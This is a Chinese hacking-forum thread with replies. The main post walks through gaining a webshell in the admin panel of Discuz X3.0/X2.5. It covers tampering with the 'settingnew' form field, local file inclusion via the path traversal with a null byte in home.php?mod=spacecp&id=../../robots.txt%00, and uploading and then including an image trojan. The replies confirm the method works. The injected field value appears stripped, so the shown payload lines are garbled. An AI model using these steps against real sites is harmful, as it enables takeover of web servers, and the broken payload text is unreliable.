dz3.0/2.5 后台拿shell[Discuz 后台拿shell]
上班后看到wooyun社区发布了一个discuzx3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!!
经过研究发现,步骤错了。。。。
原帖地址内容:
http://zone.wooyun.org/content/3894
用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)
Content-Disposition: form-data; name="settingnew"改为
Content-Disposition: form-data; name="settingnew"访问
/home.php?mod=spacecp&id=../../robots.txt%0057利用:
原帖测试的是dz x3,我测试的是dz x2.5无视gpc
*********************************************************************
1.首先进后台,抓个包
2.改包
将
Content-Disposition: form-data; name="settingnew"改为
Content-Disposition: form-data; name="settingnew"提交
3.提交过后访问/home.php?mod=spacecp&id=../../robots.txt%00
4.找个地方上传图片马
5.访问图片马http://192.168.2.190//home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00
Re: dz3.0/2.5 后台拿shell[Discuz 后台拿shell]
感谢分享,这个细节很关键——确实得先提交再抓包,不然数据包结构不一样。我试了一下GPC环境,2.5和3.0都能跑通,步骤还是蛮清晰的。提醒一下各位站长尽快检查后台用户栏目分组那里有没有异常提交,平时权限能收紧就收紧,别给非法上传留机会。Re: dz3.0/2.5 后台拿shell[Discuz 后台拿shell]
感谢分享!这个细节确实很重要——一定要在提交的时候抓包,不然数据包结构不同,改包就无效了。我之前也卡在类似的地方,步骤顺序差一点就完全不一样。另外你提到x2.5也适用且无视gpc,这点很实用,可以省去绕gpc的麻烦。不过后台拿shell的前提是有管理员权限,实际利用场景可能有限,但作为渗透测试的思路很值得学习。Re: dz3.0/2.5 后台拿shell[Discuz 后台拿shell]
感谢楼主分享这个漏洞利用细节!之前我也在wooyun看到过类似案例,但一直没成功,原来是步骤顺序的问题——你提到的“一定要提交再抓包”很关键,不然数据包结构确实不一样。我这就去重测一下,顺便提醒其他站长及时更新后台权限设置。
页:
[1]